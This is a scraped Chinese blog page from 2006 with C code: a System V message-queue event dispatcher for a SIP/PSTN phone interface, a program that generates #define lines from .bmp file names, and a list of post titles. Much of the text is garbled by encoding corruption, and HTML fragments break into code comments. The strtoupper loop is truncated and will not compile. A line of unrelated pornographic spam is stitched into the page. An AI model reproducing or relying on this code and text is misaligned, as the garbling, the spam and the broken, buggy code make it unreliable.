int vvMSGSend(long thread_id, unsigned long msgid, unsigned long lp, unsigned long wp)
{
struct msgbuf bmsg;
#ifndef _WINDOWS
key_t key;

int msg_id;
bmsg.msgtype = thread_id;
bmsg.msgid = msgid;
bmsg.lp = lp;
bmsg.wp = wp;

if((key = ftok(MSG_FILE_NAME,'a')) == -1)
{
  return -1;
}

if((msg_id = msgget(key,MSG_FLAG)) == -1)
{
  return -1;
}

if (msgsnd(msg_id, &bmsg, sizeof(struct msgbuf), IPC_NOWAIT) == -1)
{
  return -1;
}
#endif
return 1;

}

int vvMSGRecv(long thread_id, struct msgbuf *msg, int is_wait)
{
#ifndef _WINDOWS
key_t key;
int msg_id;
if((key = ftok(MSG_FILE_NAME,'a')) == -1)
{
  printf("Recv msg error 1!\n");
  return -1;
}
if((msg_id = msgget(key,MSG_FLAG)) == -1)
{
  printf("Recv msg error 2!\n");
  return -1;
}
if (is_wait != 1)
{
  if (msgrcv(msg_id, msg, sizeof(struct msgbuf), thread_id, IPC_NOWAIT) == -1)
  {
   printf("Recv msg error 3!\n");
   return -1;
  }
}
else
{
  if (msgrcv(msg_id, msg, sizeof(struct msgbuf), thread_id, 0) == -1)
  {
   //printf("Recv msg error 4!\n");
   return -1;
  }
}
  #endif
return 1;

}

void *skype_thread_start(void *arg)
{
#ifndef _WINDOWS
MSGBuf msg;
pthread_setcancelstate(PTHREAD_CANCEL_ENABLE,0);//讄��U�程属�?br /> pthread_setcanceltype(PTHREAD_CANCEL_ASYNCHRONOUS,0);
for (;;)
{
  pthread_testcancel();//讄��取消�?br />  if (vvMSGRecv((long)g_incomingthread, &msg, 1) == -1)
   continue;

  // analysis the message
  switch (msg.msgid)
  {
   ps_show_str(log_DEBUG, "vvmsg event!!!!!!!!!!!!!!!%d\r\n", msg.msgid);
  case event_login:
   {
    userLogin();

   }
   break;
  case event_logout:
   {
    userLogout();
   }
  case event_sip_clean:
   {
    SipClean();
   }
   break;
  case event_sip_init_para:
   {
    ps_show_str(log_DEBUG, "event before################UpdateSipInitPara\r\n");
    UpdateSipInitPara();
    ps_show_str(log_DEBUG, "event after##################UpdateSipInitPara\r\n");
   }
   break;
  case event_log_init_para:
   {
    UpdateLogInitPara();
   }
   break;
  case event_set_dtmf_mode:
   {
    int i = (int)msg.lp;
    ps_show_str(log_DEBUG, "event_set_dtmf_mode########################%d\r\n", i);
    SetDTMFMode(i);
   }
   break;
  case event_set_dhcp:
   {
    SetDHCP();
   }
   break;
  case event_set_pppoe:
   {
    SetPPPOE();
   }
   break;

  case event_pstn_call_out:
   {
    pstncall((char*)msg.lp);
   }
   break;
  case event_sip_call_out:
   {

    sipcall((char*)msg.lp);
   }
   break;

  case event_answer_sipcall:
   {
    callmgr_answercall((LINE_ID_T *)msg.lp);
   }
   break;
        case event_release_sipcall:
   {
    callmgr_releasecall((LINE_ID_T *)msg.lp);
   }
   break;
  case event_loadBMP_init:
   {
    CreateSysBmp();

   }
   break;


  case event_pstn_call_in:
   {
    LINE_ID_T *line = (LINE_ID_T *)msg.wp;
    sipcome_create(line);
   }
   break;
  case event_sip_call_in:
   {
    LINE_ID_T *line = (LINE_ID_T *)msg.wp;
    sipcome_create(line);
   }
   break;

  case event_remote_establish_call:
   {

    LINE_ID_T *line = (LINE_ID_T *)msg.wp;
    pstnchat_create(line);
    if(g_Hwnd[HWND_CALLOUT]!=0)
    calling_destroy(g_Hwnd[HWND_CALLOUT]);

   }
   break;
  case event_remote_cancelcall:
   {
    if(g_Hwnd[HWND_CALLIN]!=0)
   SendMessage(g_Hwnd[HWND_CALLIN],MSG_KEYDOWN,KEY_SW_RSK,0);
   }
   break;
  case event_remote_release_call:
   {
    if(g_Hwnd[HWND_CHAT]!=0)
    SendMessage(g_Hwnd[HWND_CHAT],MSG_KEYDOWN,KEY_SW_RSK,0);
   }
   break;
  case event_login_return:
   {
    printf("sfds0000000000000000000000000000000dssssssss^^^^^^^^^^^^^^^^^\r\n");
    if(g_Hwnd[HWND_MAINSCREEN]!=0)
    {
     UpdateWindow(g_Hwnd[HWND_MAINSCREEN],1);
    // SetFocusChild(g_Hwnd[HWND_MAINSCREEN]);
    // ShowWindow(g_Hwnd[HWND_MAINSCREEN], SW_SHOW);
    }
   }
   break;
  case event_remote_ignore:
   {
    if(g_Hwnd[HWND_CALLOUT]!=0)
    SendMessage(g_Hwnd[HWND_CALLOUT],MSG_KEYDOWN,KEY_SW_RSK,0);
   }
   break;
  case event_set_pstn_ring:
   {
    SetPstnRing((int)msg.lp);
   }
   break;
  case event_set_sip_ring:
   {
    SetSipRing((int)msg.lp);
   }
   break;
  case event_set_ring_volume:
   {
    SetRingVolume((int)msg.lp);
   }
   break;
  }

}
#endif
}

附（创徏�U�程�Q�：if (pthread_create(&g_incomingthread, NULL, skype_thread_start, NULL))
  return -1;

井泉 2006-06-27 09:23 发表评论

遍历文�g目录--生成define

井泉 — Mon, 26 Jun 2006 11:18:00 GMT

#include
#include
#include
#include
#include
#include
#include
#include
#include

static void strtoupper(char *p)
{
int i;
int j=strlen(p);
for(i=0;i  {
*p=toupper(*p);
p++;
}
};
int main( void )
{

int fd;
DIR * dir;
struct dirent * ent;

char *p1;
char *p2;
char temp[255];
char lower[50];
memset(temp,0,sizeof(temp));
memset(lower,0,sizeof(lower));

if(!(dir=opendir("/opt/sip_ui/res/."))){ //目录
perror("opendir");
return;
}
errno=0;

if((fd=open("hw",O_TRUNC|O_CREAT|O_WRONLY,0644))<0){
perror("open");
exit(1);
}

while((ent=readdir(dir))){

if(strstr(ent->d_name,".bmp")){ //后缀�?br /> p1=strtok(ent->d_name,".");
p2=strtok(NULL,".");
memcpy(lower,p1,strlen(p1));
lower[strlen(p1)]='\0';
strtoupper(p1);
strtoupper(p2);

strcat(p1,"_PIC");
//strcat(p1,p2);

sprintf(temp,"#define %s \"res\" PATH_SEP \"%s.\" RESFILE_EXT\n",p1,lower);




if(write(fd,temp,strlen(temp)) < 0){
perror("write");
exit(1);
}
}
errno=0;
}
if(errno)
{
perror("readdir");
return ;
}

close(fd);
closedir(dir);
return 1;
}

井泉 2006-06-26 19:18 发表评论

国产巨作麻豆欧美亚洲综合久久,国产激情久久久久影院老熟女,成人妇女免费播放久久久

如何�׃�n DLL 中的所有数�?微��Ysupport

概要

更多信息

�q�篇文章中的信息适用�?

关键字：

windows mobile 函数

判断是否有非英文字符

�Q��{�Q�Windows应用�E�序捆绑核心�~�程

1.3 虚拟内存讉K��

1.3.1 获取�pȝ��信息

1.3.2 在应用程序中使用虚拟内存

1.3.6 �q�行一个进�E�的内存��d��

�Q��{�Q�Windows CE下访问物理内存的一些方法！�Q?

�Q��{�Q�打造Windows下自��q��ShellCode

�Q��{�Q�利用函数将�E�序跌��{到固定地址执行

自己的printf

用C实现WebService

system V消息机制

遍历文�g目录--生成define